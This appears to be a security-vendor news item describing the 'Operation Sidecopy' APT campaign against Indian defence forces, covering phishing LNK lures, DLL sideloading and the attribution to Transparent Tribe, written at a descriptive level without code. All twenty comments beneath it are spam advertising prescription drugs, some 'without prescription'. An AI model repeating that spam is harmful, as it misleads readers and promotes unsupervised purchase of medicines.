Seqrite, the cybersecurity products and solutions brand of Quick Heal Technologies has uncovered a new Advanced Persistent Threat (APT) targeting India’s Defence Forces. Dubbed as ‘Operation Sidecopy’, threat actors behind this campaign were found misleading the security community by copying Tactics, Techniques, and Procedures (TTPs) that point at the Sidewinder APT group. However, researchers at Seqrite have discovered strong evidence of ‘Operation Sidecopy’, having potential links with Pakistan backed – Transparent Tribe group. This is a breakthrough discovery making Seqrite the first cybersecurity brand to expose the real identity of these threat actors.
Post revelation, Seqrite alerted the Government authorities to take precautionary measures. Researchers at Seqrite suspect that China could be leveraging Pakistan-based APT groups to barge in and gather intelligence from India that can benefit them in the on-going India-China conflicts. They further warned that these attacks can put intelligence agencies at risk of losing sensitive information which can be leveraged by both the neighbouring countries. This may happen directly via data exfiltration or indirectly via compromising an individual and compelling them to share confidential data.
Active since early 2019, ‘Operation Sidecopy’ has been using infecting vectors like LNK file, template injection, and equation editor vulnerability to target Indian defence forces. For Command & Control, it has been using Contabo GmbH, the most common hosting providers favoured by Transparent Tribe. According to Seqrite researchers, the malicious actors have been continuously developing malware modules and deploying the updated versions after analyzing the victim’s data and environment. Interestingly, these attackers were even keeping track of malware detected by a system’s AV and hence updating them immediately so that there is no trace left for further investigation.
Uncovering the attack
A couple of months ago, Seqrite’s next-generation behavioural detection technology alerted on a few processes running executable HTML files from non-reputed websites. In addition, the researchers noticed that offending processes had interesting names such as “Defence Production Policy 2020.docx.lnk”. When combined, these factors served as the trigger for advance investigation. Upon probing further, Seqrite researchers found that these attacks were targeted at Indian defence units and armed forces’ individuals.
The attack started with the victim receiving LNK files in the form of compressed ZIP/RAR via phishing emails. Since these files appeared to have realistic names and icons as if they are directly coming from the Government of India, the victims are likely to consider them authentic and get tricked into opening them.
Once opened, the malware runs in the system’s memory, and gradually downloads / installs other components, eventually stealing user data and uploading it to attacker-controlled servers. This attack made use of DLL-Sideloading technique (aka Black-White technique). A Microsoft signed a legitimate system process (credwiz.exe) was used to run malware via sideloading technique. After infiltrating the victim’s machine, the malware immediately restarts the victim’s device, to clear initial infection traces.
20 comments
atorvastatin 80mg brand atorvastatin for sale online order generic atorvastatin 10mg
buy generic ciprofloxacin – buy ciprofloxacin 500 mg generic erythromycin 500mg oral
how to buy valacyclovir – valacyclovir usa buy acyclovir 800mg without prescription
stromectol 3mg online – suprax oral tetracycline oral
lasix for sale online – buy generic candesartan capoten oral
cost acillin order monodox pills buy amoxicillin cheap
zidovudine cost – allopurinol 100mg pills purchase zyloprim generic
clozapine usa – order clozapine generic pepcid ca
atarax sale – order nortriptyline 25mg pill endep usa
buy amoxicillin tablets – cephalexin 125mg us oral ciprofloxacin
order cleocin 300mg generic – terramycin 250mg usa chloramphenicol buy online
clarinex brand – cost clarinex 5mg ventolin 2mg pill
micronase usa – buy micronase 2.5mg without prescription dapagliflozin 10mg ca
repaglinide 1mg pill – jardiance 25mg brand jardiance 25mg us
order glucophage generic – buy generic precose over the counter buy acarbose 50mg online
purchase ketoconazole generic – buy butenafine without prescription sporanox 100 mg tablet
order generic semaglutide 14 mg – buy glucovance tablets buy DDAVP online
buy digoxin 250 mg online – buy furosemide 40mg online purchase lasix generic
buy famvir tablets – order famciclovir 250mg online cheap buy valcivir pills for sale
cheap hydrochlorothiazide – buy cheap amlodipine zebeta 5mg pills